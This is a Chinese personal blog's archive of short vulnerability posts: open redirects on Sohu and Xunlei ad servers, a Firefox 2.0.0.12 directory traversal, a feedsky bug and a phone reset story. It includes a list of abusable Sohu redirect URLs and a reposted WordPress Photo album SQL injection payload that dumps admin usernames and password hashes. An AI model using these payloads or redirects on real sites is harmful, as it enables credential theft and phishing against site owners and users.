Category Archives: 漏洞
搜狐营销广告服务跨站漏洞[doc.go.sohu.com*url=]
看看下边这个转向到哪里啦http://doc.go.sohu.com/200712/6e97cd2fea9a0f8ac95439405c4ca95a.php?url=http://clin003.com 以下为查到的包含漏洞的页面(仅仅通过搜索引擎的索引结果) 这些链接在sohu都是在flash文件广告中的,所以baidu是搜不出来的,因为google的蜘蛛已经可以读flash文件中的部分文本啦,使用这个关键字搜索google就可以:site:sohu.com [doc.go.sohu.com*url=] 显然在club中出现的是已经利用的链接,下面的flash和专题新闻中的才是sohu真正使用的链接形式。 百度中找 doc.go.sohu.com url你将发现已经有很多利用的“恶意链接”啦,百度一下,找到相关网页约905篇,用时0.001秒 google中找[doc.go.sohu.com*url=],约有1,390项符合[doc.go.sohu.com*url=]的查询结果,以下是第1-10项 ,不过google中部分标有“该网站可能含有恶意软件,有可能会危害您的电脑。”。 漏洞的成因很可能就是设计广告跳转记录代码的工作人员为啦以后方便使用就这样写啦个“通用代码”而没想到被发现会造成多少信任搜狐的网民受伤!! 以下是通过搜索引擎得到的部分可以利用的链接(请学习为目的,不要拿去害人) http://doc.go.sohu.com/200801/5cb05572fda7c20a914842413d61ae7d.php?url= http://doc.go.sohu.com/200712/d82c5aba39716d4eb8152d976a2da482.php?url= http://doc.go.sohu.com/200712/e49df42d95615e85312aa0d030a2e552.php?url= http://doc.go.sohu.com/200710/91e2420557be06fc6b4db18e6c7e43b8.php?url= http://doc.go.sohu.com/200709/fd89d3a23c26c83163939a489fac349b.php?url= http://doc.go.sohu.com/200708/adf56d76ba663e3db61b83e84384a141.php?url= http://doc.go.sohu.com/200707/9b5c09c5c3cb8d856393a150683a5d92.php? url= http://doc.go.sohu.com/200706/fa9cda8c2a8455dc7e69465a16d48565.php?url= http://doc.go.sohu.com/200706/1a22b9706f5ee9794ee29582de28d8a7.php?url= http://doc.go.sohu.com/200705/df7fe00bc4bdb3ab1891dd6be56aa73a.php?url= http://doc.go.sohu.com/200704/92d82b0a5606d9025e44b161597c0180.php?url= http://doc.go.sohu.com/200704/cb19f7e8aa1d533134eea9c1197c423b.php?url= http://doc.go.sohu.com/200703/e463ac8934207e079c5500ebddf964e1.php?url= http://doc.go.sohu.com/200702/4788bbdf19b48e08a119cea260a63aaf.php?url=
WordPress Photo album Remote SQL Injection Vulnerability
EXAMPLEhttp://xxxxxxxx/?page_id=13&album= [exploit]EXPLOİTS@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201# WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字
Posted in wordpress支持, 漏洞
Tagged admin, Photo, Remote SQL Injection, WordPress, 权限, 注入, 漏洞
1 Comment
Firefox 2.0.0.12暴目录穿越(directory traversal)漏洞
Firefox 2.0.0.12默认设置存在严重漏洞,预计2.0.0.13将会很快推出。是目录穿越(directory traversal)漏洞,攻击者可以使用view-source机制查看所有Firefox的参数设置,或是Firefox安装目录下的所有文件,不需要任何强制设置或插件帮助。比如“resource:///”默认会直接定位到“file:///C:/Program Files/Mozilla Firefox/”。
恶搞feedsky域名绑定(feedsky的一个小bug)
feedsky的域名绑定貌似更换好几天啦,这次去更改下域名解析,发现feedsky的一小bug 看图: feedsky绑定的结果: 可喜的是并没有对其他用户造成什么影响,呵呵:) 我现在还改回来,以免以后还要去改!!,也欢迎来订阅我的Rss
很显然pplive的广告业务中有跨站漏洞(迅雷:cknum.xunlei.com)
http://cknum.xunlei.com/fcg-bin/cgi_banner_stat.fcg?url=http://wz.mygogou.com/直接打开这个链接就会转到本博客。 这个(cknum.xunlei.com)是pplive的一个广告服务器(频道)。 还不清楚pplive和迅雷是不是只是广告上的合作。 pplive的广告服务器地址有: cknum.xunlei.com cop.my.xunlei.com biz5.sandai.net pt.cga.com.cn pp.pplive.com
E2手机病毒?
漫不经心的打开主菜单,天!竞只剩固定拨号,神州行,,几个图标!我的第一感觉就是中病毒啦?不太可能吧!一个小小的e2?难到是昨晚电用完时的非法关机。试着关机开机几遍都没作用。奇怪啦,快捷键都能用(可以重新设置,只能看见应用程序,看不见系统设置类的菜单!),就是从主菜单没法找到!,最后终于在侧面语音功能中找到”复位”菜单,只有删除全部的复位功能把主菜单找回来啦,感谢ing,不过代价是短信,通信录等手机上存的资料统统丢失,内存卡上的软件要重新下过用设置依然。明白啦e2安全密码是在手机复位时用到和锁定密码不同!